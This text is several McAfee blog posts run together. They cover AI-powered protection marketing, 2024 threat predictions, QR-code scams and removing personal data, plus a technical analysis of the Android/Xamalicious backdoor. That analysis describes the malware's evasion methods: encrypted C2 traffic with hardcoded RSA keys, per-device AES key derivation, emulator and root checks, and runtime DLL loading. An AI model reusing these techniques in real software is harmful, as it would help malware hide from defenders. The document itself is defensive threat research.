Now we’ve made improvements to our AI-driven protection — and unveiled all-new features that take full advantage of AI, such as McAfee Next-gen Threat Protection and McAfee Scam Protection.
McAfee’s AI-powered security just got faster and stronger. Our Next-gen Threat Protection takes up less disk space, reduces its background processes by 75%, and scans 3x faster than before. This makes your time online safer without slowing down your browsing, shopping, streaming, and gaming.
Results from AV-TEST’s product review in October 2023 saw it block 100% of entirely new malware attacks in real-world testing. It likewise scored 100% against malware discovered in the previous four weeks. In all, it received the highest marks for protection, performance, and usability — earning it the AV-TEST Top Product certification.
Moreover, AI continually gets smarter because every evaluation provides more data for it to learn and improve its accuracy. McAfee conducts over 4 billion threat scans a day, and that number is quickly growing. We continue to innovate with leading-edge AI technology to provide the most advanced and powerful protection available.
The AI-powered scam protection in McAfee+ is like having that lie detector test we mentioned earlier. Advanced AI-powered technology helps prevent you from opening scam texts and blocks risky sites if you accidentally click on a scam link in texts, QR codes, emails, social media posts, and more. This AI-driven scam protection delivers real-time mobile alerts when a scam text is detected and is the only app on the market that sends alerts on both iOS and Android.
Advances in threat protection and scam protection mark just the start of where we’re taking our long-standing use of AI next. Sure, AI has made life easier for hackers and scammers. In some ways. In yet more important ways, it’s making their lives far more difficult. Downright tough in fact, particularly as we use it here at McAfee to detect their scam messages and texts, beat their AI-generated malware, and warn you of their malicious websites. And that’s just for starters. We have more to come.
You can expect to see other fraud-busting and info-validating uses of AI across our online protection software in the months to come. That’s what’s in store as we stand as you ally in the age of AI.
The post How to Stay Safe in the Age of AI appeared first on McAfee Blog.
AI and major elections, deepfakes and the Olympics — they all feature prominently in our cybersecurity predictions for 2024.
That’s quite the mix. And that mix reflects the nature of cybersecurity. Just as changing technology shapes cybersecurity, it gets further shaped by the changing world we live in. The bad actors out there exploit new and emerging technologies — just as they exploit events and trends. It’s a potent formula that bad actors turn to again and again. With it, they concoct a mix of ever-evolving attacks.
For a pointed example of the interplay between technology and culture, look no further than Barbie. More specifically, the scams that cropped up around the release of the “Barbie” movie. Using AI tools, scammers generated videos that promoted bogus ticket giveaways. They combined the new technology of AI with the hype surrounding the film and duped thousands of victims as a result.
We expect to see more of the same in 2024, and we have several other predictions as well. With that, let’s look ahead so you can stay ahead of the hacks and attacks we expect to see in 2024.
2024 has plenty on the slate in terms of pivotal elections. Across the globe, we have the United States presidential election, general elections in India, and the European Union parliamentary elections, to name a few. While every election comes with its fair share of disinformation, the continued evolution of generative AI tools such as ChatGPT, DALL-E, and Stable Diffusion add an extra level of complication.
So, if a picture is worth a thousand words, what’s an AI-generated photo, video, or voice clone worth? For disinformation, plenty.
Already, many voters raise a skeptical brow when politicians sling statements aimed at discrediting their opponents. Yet when those words are backed by visual evidence, such as a photo or video, it lends them the appearance of credibility. With AI tools, a few keywords can give a false statement or accusation life in the form of a (bogus) photo or video, which now go by the common name of “deepfakes.”
Certainly, 2024 won’t be the first election where bad actors or unscrupulous individuals try to shape public opinion through the manipulation of photos and videos. However, it will be the first election where generative AI tools are significantly more accessible and easier than ever to use. As a result, voters can expect to see a glut of deepfakes and disinformation as the election cycle gears up.
Likewise, the advent of AI voice-cloning tools complicates matters yet more. Consider what that means for the pre-recorded “robocalls” that campaigns use to reach voters en masse. Now, with only a small sample of a candidate’s voice, bad actors can create AI voice clones with striking fidelity. They read from any script a bad actor bangs out and effectively put words in someone else’s mouth — potentially damaging the reputation and credibility of candidates.
As we reported earlier this year, AI voice cloning is easier and more accessible than ever. It stands to reason that bad actors will turn it to political ends in 2024.
Disinformation has several goals, depending on who’s serving it up. Most broadly, it involves gain for one group at the expense of others. It aims to confuse, misdirect, and manipulate its audience — often by needling strong emotional triggers. That calls on us to carefully consider the media and messages we see, particularly in the heat of the moment.
That can present challenges at a time when massive amounts of content scroll by our eyes in our subscriptions and feeds. Bad actors count on people taking content at immediate face value. Yet asking a few questions can help you spot disinformation when you see it.
The International Federation of Library Associations and Institutions offers this checklist:
That last piece of advice is particularly strong. De-bunking disinformation takes time and effort. Professional fact-checkers at news and media organizations do this work daily. Posted for all to see, they provide a quick way to get your answers. Some fact-checking groups include:
Put plainly, bad actors use disinformation to sow discord and divide people. While not every piece of controversial or upsetting piece of content is disinformation, those are surefire signs to follow up on what you’ve seen with several credible sources. Also, keep in mind that those bad actors out there want you to do their dirty work for them. They want you to share their content without a second thought. By taking a moment to check the facts before you react, curb the dissent they want to see spread.
In the ever-evolving landscape of cybercrime, the emergence of AI has introduced a new level of sophistication and danger. With the help of AI, cybercriminals now possess the ability to manipulate social media platforms and shape public opinion in ways that were previously unimaginable.
One of the most concerning aspects of this development is the power of AI tools to fabricate photos, videos, and audio. These tools enable bad actors to create highly convincing and realistic content, making it increasingly difficult for users to discern between what is real and what is manipulated. This opens up a whole new realm of possibilities for cybercriminals to exploit unsuspecting individuals and organizations.
One alarming consequence of this is the potential for celebrity and influencer names and images to be misused by cybercrooks. With the ability to generate highly convincing content, these bad actors can create fake endorsements that appear to come from well-known personalities. This can lead to an increase in scams and fraudulent activities, as unsuspecting consumers may be more likely to trust and engage with content that appears to be endorsed by their favorite celebrities or influencers.
Local online marketplaces are also at risk of being targeted by cybercriminals utilizing AI. By leveraging fabricated content, these bad actors can create fake listings and advertisements that appear legitimate. This can deceive consumers into making purchases or engaging in transactions that ultimately result in financial loss or other negative consequences.
As AI continues to advance, it is crucial for consumers to be aware of the potential risks and take necessary precautions. This includes being vigilant and skeptical of content encountered on social media platforms, verifying the authenticity of endorsements or advertisements, and utilizing secure online marketplaces with robust verification processes.
One of the most troubling trends on the horizon for 2024 is the alarming rise of cyberbullying, which is expected to be further exacerbated by the increasing use of deepfake technology. This advanced and remotely accessible tool has become readily available to young adults, enabling them to create exceptionally realistic fake content with ease.
In the past, cyberbullies primarily relied on spreading rumors and engaging in online harassment. However, with the emergence of deepfake technology, the scope and impact of cyberbullying have reached new heights. Cyberbullies can now manipulate images that are readily available in the public domain, altering them to create fabricated and explicit versions. These manipulated images are then reposted online, intensifying the harm inflicted on their victims.
The consequences of this escalating trend are far-reaching and deeply concerning. The false images and accompanying words can have significant and lasting effects on the targeted individuals and their families. Privacy becomes compromised as personal images are distorted and shared without consent, leaving victims feeling violated and exposed. Moreover, the fabricated content can tarnish one’s identity, leading to confusion, mistrust, and damage to personal and professional relationships.
The psychological and emotional well-being of those affected by deepfake cyberbullying is also at stake. The relentless onslaught of false and explicit content can cause severe distress, anxiety, and depression. Victims may experience a loss of self-esteem, as they struggle to differentiate between reality and the manipulated content that is being circulated online. The impact on their mental health can be long-lasting, requiring extensive support and intervention.
The ripple effects of deepfake cyberbullying extend beyond the immediate victims. Families are also deeply affected, as they witness the distress and suffering of their loved ones. Parents may feel helpless and overwhelmed, struggling to protect their children from the relentless onslaught of cyberbullying. The emotional toll on families can be immense, as they navigate the challenges of supporting their children through such traumatic experiences.
Scammers exploit emotions – such as the excitement of the Olympics. Darkly, they also tap into fear and grief.
A particularly heartless method of doing this is through charity fraud. While this takes many forms, it usually involves a criminal setting up a fake charity site or page to trick well-meaning contributors into thinking they are supporting legitimate causes or contributing money to help fight real issues.
2024 will see this continue. We further see potential for this to increase given the conflicts in Ukraine and the Middle East. Scammers might also increase the emotional pull of the messaging by tapping into the same AI technology we predict will be used in the 2024 election cycle. Overall, expect their attacks to look and feel far more sophisticated than in years past.
Aside from its ability to write love poems, answer homework questions, and create art with a few keyword prompts, AI can do something else. It can code. In the hands of hackers, that means AI can churn out new strains of malware and even spin up entire malicious websites. And quickly at that.
Already, we’ve seen hackers use AI tools to create malware. This will continue apace, and we can expect them to create smarter malware too. AI can spawn malware that analyzes and adapts to a device’s defenses. This helps particularly malicious attacks like spyware and ransomware to infect a device by allowing it to slip by undetected. It also makes the creation and dissemination of convincing phishing emails and QR code scams, faster and easier. This extends to the creation of deepfake video, photo, and audio content aimed at deceiving unsuspecting targets and scamming them out of money. The rise of QR code scams, also known as quishing, is an additional concern. Scammers use AI to generate malicious QR codes that, when scanned, lead to phishing websites or trigger malware downloads. As the barrier to entry for these threats lowers, these scams will spread to all platforms with an increased focus on mobile devices.
However, like any technology, AI is a tool. It works both ways. AI is on your side. In fact, it’s kept you safer online for some time now. Meanwhile, at McAfee, we’ve used AI as a core component of our protection for years now. As such, it’s done plenty for you over the years. AI has sniffed out viruses, malicious websites, and sketchy content online. It’s helped steer you clear of malicious websites too.
As such, you can expect an increasing number of AI-powered tools that combat AI-powered threats.
With big events come big scams. Look for plenty of them with the 2024 Summer Olympics.
An event with this level of global appeal attracts scammers looking to capitalize on the excitement. They promise tickets, merch, and exclusive streams to events, among other things. Yet they take a chunk out of your wallet and steal personal info instead.
You can expect to see a glut of email-based phishing and message-based smishing attacks. Now, with the introduction of generative AI, these scams are getting harder and harder to identify. AI writes cleaner emails and messages, so fewer scams feature the traditional hallmarks of misspelled words and poor grammar. Combine that with the excitement generated around the Olympic games, and we can easily see how people might be tempted by bogus sweepstakes and offers for the Olympics trip of a lifetime. If they only click or tap that link. Which of course leads to a scam website.
You can expect these messages to crop up across a variety of channels, including email, text messages, and other messaging channels like WhatsApp and Telegram. They might slide into social media DMs as well.
If you’re planning to catch the Olympic action in person, scammers have a plan in mind for you — ticket fraud. As we’ve seen at the FIFA World Cup and several other major sporting events over the years, scammers spin up scam ticket sites with tickets to all kinds of matches and events. Again, these sites don’t deliver. These sites can look rather professional, yet if the site only accepts cryptocurrency or wire transfers, you can be certain it’s fraud. Neither form of payment offers a way to challenge charges or recoup losses.
The post 6 Cybersecurity Predictions for 2024 – Staying Ahead of the Latest Hacks and Attacks appeared first on McAfee Blog.
Authored by Fernando Ruiz
McAfee Mobile Research Team identified an Android backdoor implemented with Xamarin, an open-source framework that allows building Android and iOS apps with .NET and C#. Dubbed Android/Xamalicious it tries to gain accessibility privileges with social engineering and then it communicates with the command-and-control server to evaluate whether or not to download a second-stage payload that’s dynamically injected as an assembly DLL at runtime level to take full control of the device and potentially perform fraudulent actions such as clicking on ads, installing apps among other actions financially motivated without user consent.
The second stage payload can take full control of the infected device due to the powerful accessibility services that were already granted during the first stage which also contains functions to self-update the main APK which means that it has the potential to perform any type of activity like a spyware or banking trojan without user interaction. However, we identified a link between Xamalicious and the ad-fraud app “Cash Magnet” which automatically clicks ads, installs apps, and other actions to fraudulently generate revenue while users that installed it may earn points that are supposed to be redeemable as a retail gift card. This means that the developers behind these threats are financially motivated and drive ad-fraud therefore this might be one of the main payloads of Xamalicious.
The usage of the Xamarin framework allowed malware authors to stay active and without detection for a long time, taking advantage of the build process for APK files that worked as a packer to hide the malicious code. In addition, malware authors also implemented different obfuscation techniques and custom encryption to exfiltrate data and communicate with the command-and-control server.
We’ve identified about 25 different malicious apps that carry this threat. Some variants have been distributed on Google Play since mid-2020. The apps identified in this report were proactively removed by Google from Google Play ahead of our reporting. McAfee is a member of the App Defense Alliance and an active partner in the malware mitigation program, which aims to quickly find Potentially Harmful Applications (PHAs) and stop them before they ever make it onto Google Play. Android users are protected by Google Play Protect, which can warn users of identified malicious apps on Android devices. McAfee Mobile Security detects this threat as Android/Xamalicious.
Based on the number of installations these apps may have compromised at least 327,000 devices from Google Play plus the installations coming from third-party markets that continually produce new infections based on the detection telemetry of McAfee clients around the world. This threat remains very active.
Figure 1. “Count Easy Calorie Calculator” was available on Google Play on August 2022 and carries Android/Xamalicious
Android/Xamalicious trojans are apps related to health, games, horoscope, and productivity. Most of these apps are still available for download in third-party marketplaces.
Previously we detected malware abusing Xamarin framework such as the open-sourced AndroSpy and forked versions of it, but Xamalicious is implemented differently. Technical details about Xamarin architecture are well documented and detail how .NET code is interpreted by Android using Mono.
Let’s use the app “Numerology: Personal horoscope & Number predictions” as an example. Once started it immediately requests the victim to enable accessibility services for “correct work” and provides directions to activate this permission:
Figure 2. Tricking users into granting accessibility services permission
Users need to manually activate the accessibility services after several OS warnings such as the following on the accessibility options:
Figure 3. Accessibility services configuration prompt highlights the risks of this permission.
This is not the traditional Java code or native ELF Android application, the malware module was written originally in .NET and compiled into a dynamic link library (DLL). Then it is LZ4 compressed, and it might be embedded into a BLOB file, or directly available in the /assemblies directory on the APK structure. This code is loaded then by a native library (ELF) or by the DEX file at runtime level. In simple words, this means that in some samples the reversing of the DLL assemblies is straightforward while in others it requires extra steps to unpack them.
The malicious code is usually available in two different assembly files in the /assemblies directory on the apk. Usually, file names are core.dll and a <package-specific>.dll.
Some malware variants has obfuscated the DLL assemblies to avoid analysis and reversing of the malicious code while others keep the original code available.
Figure 4. Core.dll and GoogleService.dll contain malicious code.
Once accessibility permissions are granted the malware initiates communication with the malicious server to dynamically load a second-stage payload.
Figure 5. App execution and communication with the malicious server
Android/Xamalicious collects multiple device data including the list of installed applications obtained via system commands to determine if the infected victim is a good target for the second stage payload. The malware can collect location, carrier, and network information among device rooting status, adb connectivity configuration, for instance, if the device is connected via ADB or is rooted, the C2 will not provide a second-stage payload DLL for download.
| Method/Command | Description |
| DevInfo |
Hardware and device information that includes:
|
| GeoInfo |
Location of the device based on IP address, the malware contacts services such as api.myip.com to verify the device location and ISP data.
FraudScore: Self-protection to identify if the device is not a real user |
| EmuInfo |
It lists all adbProperties that in a real device are around 640 properties. This list is encoded as a string param in URL encoded format.
This data may be used to determinate if the affected client is a real device or emulator since it contains params such as:
|
| RootInfo | After trying to identify if the device is rooted or not with multiple techniques the output is consolidated in this command |
| Packages | It uses the system commands “pm list packages -s” and “pm list packages -3” to list system and installed apps on the device. |
| Accessibility | It provides the status if accessibility services permissions are granted or not |
| GetURL | This command only provides the Android Id and it’s a request for the second-stage payload. The C2 evaluates the provided client request and returns a status and an encrypted assembly DLL. |
To evade analysis and detection, malware authors encrypted all communication and data transmitted between the C2 and the infected device, not only protected by HTTPS, it’s encrypted as a JSON Web Encryption (JWE) token using RSA-OAEP with a 128CBC-HS256 algorithm however the RSA key values used by the Xamalicious are hardcoded in the decompiled malicious DLL so decryption of transmitted information is possible if C2 infrastructure is available during the analysis.
In the Send() function Android/Xamalicious first prepares the received object, usually a JSON structure calling the function encrypt() which creates the JWT using a hardcoded RSA key. So the data is exfiltrated fully encrypted to the malware host pointing to the path “/Updater” via HTTP POST method.
Then it waits for the C2 response and passes it to the decrypt() function which has a hardcoded RSA private key to properly decrypt the received command which might contain a second stage payload for the “getURL” command.
Encrypt Method:
Figure 6. Encrypt function with hardcoded RSA Key values as XML string
The decryption method is also hardcoded into malware which allowed the research team to intercept and decrypt the communication from the C2 using the RSA key values provided as XML string it’s possible to build a certificate with the parameters to decrypt the JWE tokens content.
Collected data is transmitted to the C&C to determine if the device is a proper target to download a second-stage payload. The self-protection mechanism of the malware authors goes beyond traditional emulation detection and country code operator limitations because in this case, the command-and-control server will not deliver the second stage payload if the device is rooted or connected as ADB via USB or does not have a SIM card among multiple other environment validations.
With the getURL command, the infected client requests the malicious payload, if the C&C Server determines that the device is “Ok” to receive the malicious library it will encrypt a DLL with Advanced encryption standard (AES) in Cipher block chaining (CBC) using a custom key for the client that requested it based on the device id and other parameters explained below to decrypt the code since it’s a symmetric encryption method, the same key works for encryption and decryption of the payload.
The encrypted DLL is inserted as part of the HTTP response in the encrypted JSON Web Token “JWT”. Then the client will receive the token, decrypt it, and then decrypt the ‘url’ parm with AES CBC and a custom key.
The AES key used to decrypt the assembly is unique per infected device and its string of 32 chars of length contains appended the device ID, brand, model, and a hardcoded padding of “1” up to 32 chars of length.
For instance, if the device ID is 0123456ABCDEF010 and the affected device is a Pixel 5, then the AES key is: “0123456ABCDEF010googlePixel 5111”
This means that the DLL has multiple layers of encryption.
All these efforts are related to hiding the payload and trying to stay under the radar where this threat had relative success since some variants might have been active years ago without AV detections.
Xamalicious will name this DLL “cache.bin” and store it in the local system to finally dynamically load it using the Assembly.Load method.
Once the second stage payload has been loaded the device can be fully compromised because once accessibility permissions are granted, it can obverse and interact with any activity opening a backdoor to any type of malicious activity.
During the analysis, the downloaded second stage payload contained a DLL with the class “MegaSDKXE” which was obfuscated and incomplete probably because the C2 didn’t receive the expected params to provide the complete malicious second stage that might be limited to a specific carrier, language, app installed, location, time zone or unknown conditions of the affected device, however, we can assure that this is a high-risk backdoor that leaves the possibility to dynamically execute any command on the affected device not limited to spying, impersonation or as a financially motivated malware.
One of the Xamalicious samples detected by McAfee Mobile generic signatures was “LetterLink” (com.regaliusgames.llinkgame) which was available on Google Play at the end of 2020, with a book icon. It was poorly described as a hidden version of “Cash Magnet”: An app that performs ad-fraud with automated clicker activity, apps downloads, and other tasks that lead to monetization for affiliate marketing. This application offers users points that are supposed to be redeemable by retail gift cards or cryptocurrency.
Figure 8a. LetterLink login page after running the app for the first time.
Figure 8b. LetterLink agreement for Cash Magnet
Originally published in 2019 on Google Play, “Cash Magnet” (com.uicashmagnet) was described as a passive income application offering users to earn up to $30 USD per month running automated ads. Since it was removed by Google the authors then infiltrated LetterLink and more recently “Dots: One Line Connector” (com.orlovst.dots) which are hidden versions of the same ad-fraud scheme.
Figure 9. LetterLink Icon that hides Cash Magnet
“LetterLink” performs multiple Xamalicious activities since it contains the “core.dll” library, it connects to the same C2 server, and it uses the same hardcoded private RSA certificate to build the JWE encrypted tokens which provide a non-repudiation proof that the developers of Cash Magnet are behind Xamalicious.
Figure 10. Cash Magnet infiltrated the app as a Game, available until the end of 2023
“Dots: One Line Connector” app is not a game, the screenshot published by Google Play does not correspond to the application behavior because once it is started it just asks for authentication credentials without any logo or reference to Cash Magnet. “Dots” does not contain the same DLLs as its predecessor, however the communication with the C2 is similar using the same RSA key parameters. We reported this app to Google and they promptly removed it from Google Play.
Based on our telemetry we observed that more affected users are in the American continent with the most activity in the USA, Brazil, and Argentina. In Europe, clients also reported the infection, especially in the UK, Spain, and Germany.
Figure 11. McAfee detections Android/Xamalicious around the world
Android applications written in non-java code with frameworks such as Flutter, react native and Xamarin can provide an additional layer of obfuscation to malware authors that intentionally pick these tools to avoid detection and try to stay under the radar of security vendors and keep their presence on apps markets.
Avoid using apps that require accessibility services unless there is a genuine need for use. If a new app tries to convince you to activate accessibility services claiming that it’s required without a real and reasonable reason and requesting to ignore the operative system warning, then it’s a red flag.
The second stage payload might take control of the device because accessibility permissions are granted so any other permission or action can then be performed by the malware if these instructions are provided in the injected code.
Because it is difficult for users to actively deal with all these threats, we strongly recommend that users install security software on their devices and always keep up to date. By using McAfee Mobile Security products, users can further safeguard their devices and mitigate the risks linked with these kinds of malware, providing a safer and more secure experience.
Android/Xamalicious Samples Distributed on Google Play:
| Package Name | App Name | Installs |
| com.anomenforyou.essentialhoroscope | Essential Horoscope for Android | 100,000 |
| com.littleray.skineditorforpeminecraft | 3D Skin Editor for PE Minecraft | 100,000 |
| com.vyblystudio.dotslinkpuzzles | Logo Maker Pro | 100,000 |
| com.autoclickrepeater.free | Auto Click Repeater | 10,000 |
| com.lakhinstudio.counteasycaloriecalculator | Count Easy Calorie Calculator | 10,000 |
| com.muranogames.easyworkoutsathome | Sound Volume Extender | 5,000 |
| com.regaliusgames.llinkgame | LetterLink | 1,000 |
| com.Ushak.NPHOROSCOPENUMBER | NUMEROLOGY: PERSONAL HOROSCOPE &NUMBER PREDICTIONS | 1,000 |
| com.browgames.stepkeepereasymeter | Step Keeper: Easy Pedometer | 500 |
| com.shvetsStudio.trackYourSleep | Track Your Sleep | 500 |
| com.devapps.soundvolumebooster | Sound Volume Booster | 100 |
| com.Osinko.HoroscopeTaro | Astrological Navigator: Daily Horoscope & Tarot | 100 |
| com.Potap64.universalcalculator | Universal Calculator | 100 |
|
The post Stealth Backdoor “Android/Xamalicious” Actively Infecting Devices appeared first on McAfee Blog.
While you can’t delete your personal info from the internet entirely, you can take strong steps to remove it from risky places. Several where others could tap into it for profit or harm.
Why is it so important to take control of our personal info? It has street value, and it has for some time now. Because so much of business, finance, healthcare, and life in general runs on it, your personal info has a dollar sign to it. Plenty of people want to get a hold of it.
Personal info fuels targeted advertising and marketing campaigns, just as it helps adjusters set insurance rates and healthcare providers make projections about our well-being. Businesses want it for employment background checks. Law enforcement uses it when investigating persons of interest. Banks and credit card companies base their approvals on it. Websites and apps collect it for their own purposes, which they sometimes share or sell to third parties.
And of course, hackers, scammers, and thieves want it too. To steal your identity, drain your accounts, and wage other attacks on you.
No doubt, your personal info has value. High value. And that makes a strong argument for doing what you can to control what you share and where you share it to the best possible degree. With so much that hinges on your personal info, it’s good to know that you can take control in powerful ways. We’ll show how it’s far easier to do that today than ever before.
Taking control of your personal info starts with a look at your digital shadow. Everyone casts one. And like everyone else’s digital shadow, yours gets filled with info about you — personal info stored online across the internet.
For starters, your digital shadow includes things like posts in forums, social media profiles, the posts that you put up there, and other people’s posts that mention you. It includes other sources of info, like pictures of you in an online newsletter, your name listed in the standings of your co-ed soccer league, and a bio of you on your company’s “About Us” page. Online reviews provide potential sources too. In all, this part of your digital shadow grows larger in two ways — as you say more things, and as more things are said about you.
Your shadow grows yet more with the addition of public records. That might include what you paid for your home, who lives there with you, your age, your children, your driving record, education, occupation, and estimated income. It all depends on where you live and what data regulations are in place there. Some regions have stricter privacy rules in place than others when it comes to public records. For example, in the U.S., California, Virginia, Connecticut, Colorado, Utah, Iowa, Indiana, Tennessee, Oregon, Montana, Texas, and Delaware have strong data privacy laws on the books. The European Union has its well-known GDPR, the General Data Protection Regulation, in place.
Then there’s all manner of info about you gathered and sold by online data brokers. Data brokers pull hundreds of data points from public sources, not to mention private sources like supermarket club cards that track your shopping history. Other private sources include info from app developers and websites with less restrictive privacy policies when it comes to sharing and selling info. These data brokers sell personal info to anyone who’ll pay, including hackers, scammers, and spammers.
Finally, a sizable swathe of your shadow comes from info stored on the deep web. It forms the 95% of the internet that’s not searchable. Yet, you likely take trips there daily. Any time you go through a paywall or use a password to access internet content, you’re entering the deep web.
Examples include logging into your bank account, accessing medical records through your healthcare provider, or using corporate web pages as part of your workday. Even streaming a show can involve a trip to the deep web. None of that content is searchable.
What’s in there, aside from your Netflix viewing history? Think of all the info that forms the basis of your credit score, your health history, your financial info, and all the info that websites and advertisers capture about you as you simply spend time online. That’s the deep web too.
A subset of the deep web is the dark web. It’s not searchable as well, and it requires a special browser to access. Some of the sites and data stores found there are entirely legitimate, others questionable, and several are outright illegal. Some of your info might be there too. And yes, you’ll find dark marketplaces here where bad actors put up personal info for sale.
Everyone online indeed has a digital shadow. And some shadows are longer than others.
So, what’s the big deal? That’s how the internet works, right?
That’s a fair question. Part of the answer comes down to how important a person thinks their privacy is. Yet, more objectively, keeping a lower profile online offers better protection from cybercrime.
Consider research published by the science journal Nature, in 2019. Here’s an excerpt from the authors:
Using our model, we find that 99.98% of Americans would be correctly re-identified in any dataset using 15 demographic attributes. Our results suggest that even heavily sampled anonymized datasets are unlikely to satisfy the modern standards for anonymization set forth by GDPR [Europe’s General Data Protection Regulation] and seriously challenge the technical and legal adequacy of the de-identification release-and-forget model.
Put in practical terms, imagine a hacker or snoop gets their hands on a large set of public or private data. Like say, health data about certain medical conditions. Even though that data has been “scrubbed” to make the people in it anonymous, that hacker or snoop only needs 15 pieces of info to identify you in that mix. From there, they could pinpoint any health conditions linked to you.
In a time when all kinds of organizations gather all kinds of data, the impact of this research finding is clear. Data breaches happen, and a determined person can spot you in a batch of breached data with relative ease. They have several tools readily available that can cobble together those other 15 pieces of info to identify you. That further strengthens the argument for taking control of your personal info.
Shortening your so-called digital shadow helps improve everyday life in several ways. It can:
Cut down the number of sketchy texts, emails, and calls you get. If a hacker, scammer, or spammer can’t track down your contact info, they can’t reach you on your computers and phones. Removing info from data broker sites, old accounts you no longer use, and even social media can make it harder for them to reach you.
Reduce the risk of identity crimes, like theft, fraud, and harassment. Bad actors turn people’s info against them. With it, they take out loans in other people’s names, file bogus insurance claims, and, in more extreme cases, impersonate others for employment or criminal purposes. When you have less info online, they have less info to work with. That makes their attacks tougher to pull off. So tough that they might turn to another, easier target who has much more info online.
Keep snoops out of your business when taking care of things online. Tracking and monitoring are simple facts of going online. Sites and businesses do it for performance and marketing purposes. Hackers and bad actors do it for outright theft. Taking steps to mask and outright hide your activities online benefits your privacy and your security.
Take control of what people do and don’t know about you. Most broadly, increased privacy largely gives you the power to share your info. Not someone else. The fact is that many companies share info with other companies. And some of those other third parties might have looser data privacy and data security measures in place. What’s more, you likely have no idea who those third parties are. Increased privacy helps you take far more control of where your info does and doesn’t go.
The following can help:
1. Delete old apps. And be choosy about permissions on your phones. Fewer apps mean fewer avenues of potential data collection. If you have old, unused apps, consider deleting them, along with the accounts and data linked with them.
2. Delete old accounts. Many internet users can have over 350 online accounts, many of which they might not know are still active. McAfee Online Account Cleanup can help you delete them. It runs monthly scans to find your online accounts and shows you their risk level. From there, you can decide which to delete, protecting your personal info from data breaches and your overall privacy as a result.
3. Make your social media accounts more private. Our new McAfee Social Privacy Manager helps safeguard your privacy on social media by personalizing your privacy based on your preferences. It does the heavy lifting by adjusting more than 100 privacy settings across your social media accounts in only a few clicks. This ensures that your personal info is only visible to the people you want to share it with. It also keeps it out of search engines where the public can see it.
4. Remove your info from data brokers that sell it. McAfee Personal Data Cleanup helps you remove your personal info from many of the riskiest data broker sites out there. Running this feature regularly can keep your name and info off these sites, even as data brokers collect and post new info. Depending on your plan, it can send requests to remove your data automatically.
5. Take preventive measures. A few steps can help you keep your info off the internet in the first place. A VPN helps make your time online more private and more secure by obscuring things like your IP address and other identifying info. It also prevents hackers and snoops from monitoring your activity when you bank, shop, and access other accounts. Also, check out our article that covers privacy on your phone. Because phones offer others so many ways to gather personal info, making your phone more private helps make you more private.
The post How to Delete Yourself from the Internet appeared first on McAfee Blog.
Imagine paying $16,000 to park your car in a lot for a couple of hours. That’s what happened to one woman in the UK who fell for a QR code scam posted in a parking lot.
As reported by The Independent, scanning the posted QR code with her phone took her to a phony parking payment site that stole her card info. After her bank blocked several attempted fraudulent transactions, the scammers contacted her directly. They posed as the bank and convinced her to open a new account, racking up the equivalent of $16,000 in stolen funds.
Scams like that have spiked in popularity with crooks out there. In the U.S., the Federal Trade Commission (FTC) has warned of a fresh wave of QR code scams that have led to lost funds and identity theft. Not to mention infected devices with a glut of spyware, ransomware, and viruses.
Yet even as QR code scams become increasingly common, you can protect yourself. And enjoy the convenience they offer too, because they can truly make plenty of transactions go far more quickly.
You can find them practically anywhere nowadays.
QR stands for “quick-response,” thus a quick-response code. They look like a square of pixels and share many similarities with the bar codes you see on grocery items and other products. Yet a QR code can hold more than 300 times the data of a barcode. They’ve been around for some time. Dating back to industrial use in the 1990s, QR codes pack high volumes of visual info in a relatively compact space.
You can spot them popping up in plenty of places nowadays. With a click of your smartphone’s camera, they can quickly whisk you away to all kinds of sites.
You might see them pop up in TV ads, tacked up in a farmer’s market stand, and stapled onto telephone poles as part of a concert poster. Restaurants place QR codes on their tables so you can order from your phone. Parking lots post them on signs so you can quickly pay for parking (like above). Your drugstore might post them on shelves so that you can download a digital coupon.
Anyone can create one. A quick search for “QR code creator” turns up dozens of results. Many offer QR codes free of charge. It’s no wonder they show up in restaurants and farmer’s markets the way they do. And now in scams too.
As it is anywhere people, devices, and money meet, scammers have weaseled their way into QR codes. With the QR code scam, pointing your smartphone’s camera at a bogus QR code and giving it a scan, scammers can lead you to malicious websites and commit other attacks on your phone.
In several ways, the QR code scam works much like any other phishing attack. With a few added wrinkles, of course.
Classically, phishing attacks use doctored links that pose as legitimate websites in the hopes you’ll follow them to a scammer’s malicious website. It’s much the same with a QR code, yet they have a couple of big differences:
Typically, one of two things:
It’ll send you to a scam website designed to steal your personal and financial info. For example, a phony QR code for parking takes you to a site where you enter your credit card and license plate number. Instead of paying for parking, you pay a scammer. And they can go on to use your credit card in other places after that.
It can take you to a download that infects your device with malware. Downloads include spyware that snoops on your browsing and passwords, ransomware that locks up your device until you pay for its release (with no guarantees), or viruses that can delete or damage the things you’ve stored on your device.
Aside from appearing in emails, direct messages, social media ads, and such, there are plenty of other places where phony QR codes can show up. Here are a few that have been making the rounds in particular:
Scanning a QR code might open a notification on your smartphone screen to follow a link. Like other phishing-type scams, scammers will do their best to make that link look legitimate. They might alter a familiar company name so that it looks like it might have come from that company. Also, they might use link shorteners that take otherwise long web addresses and compress them into a short string of characters. The trick there is that you really have no way of knowing where it will send you by looking at it.
In this way, there’s more to using QR codes than simply “point and shoot.” A mix of caution and eagle-eyed consideration is called for to spot legitimate uses from malicious ones. Online protection software can help keep you safe as well.
Luckily, you can follow some basic rules and avoid QR code attacks. The U.S. Better Business Bureau (BBB) has put together a great list that can help. Their advice is right on the mark, which we’ve paraphrased and added to here:
1. Don’t open links or scan QR codes from strangers. Scammers send QR codes by email, over social media, and sometimes they even send them by physical mail as part of a “Special offer, just scan here” ploy. In all, if a QR code comes to you out of the blue, even from a friend, skip scanning it. See if you can type in a physical address to a site that you can trust instead.
2. Check the link and the destination. Given that many QR codes lead to phishing sites, look at the link that pops up after you scan it. Scammers alter addresses for known websites in subtle ways — or that differ from them entirely. For example, they might use “fed-exdeliverynotices.com” rather than the legitimate fedex.com. Or they might use a scam URL followed by text that tries to make it look legit, like “scamsite.com/fedex-delivery.” (For more on how to spot phishing attacks, check out our full article on the topic.)
3. Think twice about following shortened links. Shortened links can be a shortcut to a malicious website. This can particularly be the case with unsolicited communications. And it can still be the case with a friend or family member if their device or account has been hacked.
4. Watch out for tampering. In physical spaces, like parking lot signs, scammers have been known to stick their own QR codes over legitimate ones. If you see any sign of altering or a placement that looks slapdash, don’t give that code a scan.
5. Stick with your phone’s native QR code reader. Steer clear of QR code reading apps. They can be a security risk.
6. Don’t pay bills with QR codes. Once again, you can’t always be sure that the code will send you to a legit site. Use another trusted form of payment instead.
